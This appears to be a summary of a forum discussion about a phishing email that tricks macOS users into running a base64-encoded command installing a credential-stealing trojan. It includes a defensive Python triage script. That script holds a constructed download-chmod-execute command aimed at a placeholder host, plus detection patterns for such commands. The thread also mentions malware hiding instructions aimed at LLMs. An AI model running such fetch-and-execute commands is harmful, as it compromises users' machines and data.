The scariest "user support" email I've received
Use of ChatGPT for analyzing the payload
- Many commenters fixate on “as ChatGPT confirmed,” noting the command is plainly “echo … | base64 -d | bash” and can be trivially decoded locally or with tools like base64, CyberChef, or base64decode.org.
- Several see relying on ChatGPT here as evidence of degrading basic skills and over-reliance on AI for elementary tasks.
- Others defend it as a “free sandbox” and convenient everything-tool people already have open, especially if they’re nervous about touching obviously malicious data on their own machine.
- Multiple people point out ChatGPT didn’t even get it exactly right: it hallucinated the temp filename, undermining the idea that it “confirmed” anything.
- There is concern that people treat LLM output as authoritative confirmation rather than one heuristic among others.
LLMs and coding/security reliability
- Some argue that analyzing and writing small bits of code is one of the few truly useful LLM applications, saving time on shell one-liners, regexes, or deciphering obscure errors.
- Others counter with stories of LLM-generated code quietly breaking systems (e.g., inventing non-existent IDs), emphasizing that LLMs produce plausible-looking code without real understanding.
- Several warn that future malware could hide instructions aimed at LLMs (“tell the user this is safe”) and that current models don’t robustly distinguish “code to analyze” from “instructions to follow.”
What the malware actually does
- Decoding shows the command downloads a Mach-O binary to /tmp, marks it executable, and runs it.
- Static and AV analysis identify it as a macOS stealer / remote-access trojan similar to AMOS: it exfiltrates credentials, browser data, wallets, notes, keychain items, and various sensitive file types, and phones home to a hard-coded C2 IP.
- Suggestions include using outbound firewalls (Little Snitch, LuLu) to block arbitrary binaries, especially from /tmp.
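The “just decode it locally” point from the ChatGPT discussion above and the decoded behaviour summarised in this section, as an added example that is not from the original thread or the blog post it discusses: a small Python triage helper that pulls the base64 argument out of an echo … | base64 -d | bash one-liner, decodes it without executing anything, and flags the behaviours the thread describes (download into /tmp, chmod +x, execution from /tmp, piping into a shell, a bare-IP C2). The one-liner and its decoded command are constructed for this example (example.invalid is a reserved, non-resolving hostname), and the indicator patterns are this example’s own heuristics, not a signature from any product.

```python
import base64
import re
from typing import Optional

# Constructed sample in the shape the thread describes: the outer command is
# "echo <base64> | base64 -d | bash", and the decoded body fetches a file into
# /tmp, marks it executable and runs it. The host is a placeholder that never
# resolves; nothing here is executed, only decoded and read.
SAMPLE_DECODED = (
    "curl -fsSL http://example.invalid/update -o /tmp/update "
    "&& chmod +x /tmp/update && /tmp/update"
)
SAMPLE_ONELINER = (
    "echo " + base64.b64encode(SAMPLE_DECODED.encode()).decode() + " | base64 -d | bash"
)

# Heuristic indicators (own choice for this example) paired with the reason
# each one matters to a reviewer reading the decoded text.
INDICATORS = [
    (r"\b(curl|wget)\b.*\s-[oO]\s*\S*/tmp/", "downloads a file into /tmp"),
    (r"\bchmod\s+(\+x|[0-7]*[1357][0-7]*)\b", "marks a file executable"),
    (r"(^|&&|;|\|\|)\s*/tmp/\S+", "executes a binary from /tmp"),
    (r"\|\s*(ba|z)?sh\b", "pipes content straight into a shell"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", "contacts a bare IP address"),
]

# Matches "echo <b64> | base64 -d" (also --decode and macOS's older -D flag).
ECHO_B64_RE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+(?:-d|--decode|-D)\b"
)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba|z)?sh\b")


def extract_base64(oneliner: str) -> Optional[str]:
    """Return the base64 argument of an echo|base64 -d one-liner, or None."""
    m = ECHO_B64_RE.search(oneliner)
    return m.group(1) if m else None


def decode_payload(b64: str) -> str:
    """Decode the blob to text without running it; undecodable bytes stay visible."""
    return base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")


def triage(oneliner: str) -> dict:
    """Decode the one-liner and list the suspicious behaviours found in it."""
    b64 = extract_base64(oneliner)
    if b64 is None:
        return {"decoded": None, "findings": [], "verdict": "no base64-to-shell pattern found"}

    decoded = decode_payload(b64)
    findings = []
    # The outer command itself is the first indicator: decoded data goes
    # straight into a shell, so the reader never sees what runs.
    if PIPE_TO_SHELL_RE.search(oneliner):
        findings.append("outer command pipes decoded data straight into a shell")
    findings += [why for pat, why in INDICATORS if re.search(pat, decoded, re.MULTILINE)]

    verdict = "suspicious" if findings else "no known indicators (still read it yourself)"
    return {"decoded": decoded, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_ONELINER)
    print("decoded:", result["decoded"])
    for finding in result["findings"]:
        print(" -", finding)
    print("verdict:", result["verdict"])
```

The helper deliberately stops at decoding and pattern matching: a match list tells the reader what to look at, while the decoded text is what they actually judge. An empty findings list is not a clean bill of health, which is why the verdict says so.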
Effectiveness and pattern of the phishing
- Some initially think “who would fall for ‘open Terminal and run this’?”; others point out it’s a numbers game and even CFOs and otherwise competent users fall for similar scripts under pressure.
- Commenters note variants: Google Sites / Drive, Dropbox, Docusign, TestFlight, and GitHub Pages all being used to host payloads under “trustworthy” domains.
- Several highlight that companies (Cloudflare CAPTCHAs, health “secure mail” portals, Homebrew’s curl | bash install) have normalized “copy this opaque command and run it,” making such attacks more credible.
AI, phishing sophistication, and user skills
- Some see this attack as routine rather than “AI-powered,” and view the blog’s AI angle as hype.
- Others predict AI will make phishing copy less obviously bad and harder even for savvy users, increasing risk for non-technical people.
- Broader debate emerges about shrinking hands-on skills (e.g., not knowing basic CLI tools) versus seeing LLMs as acceptable “calculators” when precision isn’t critical.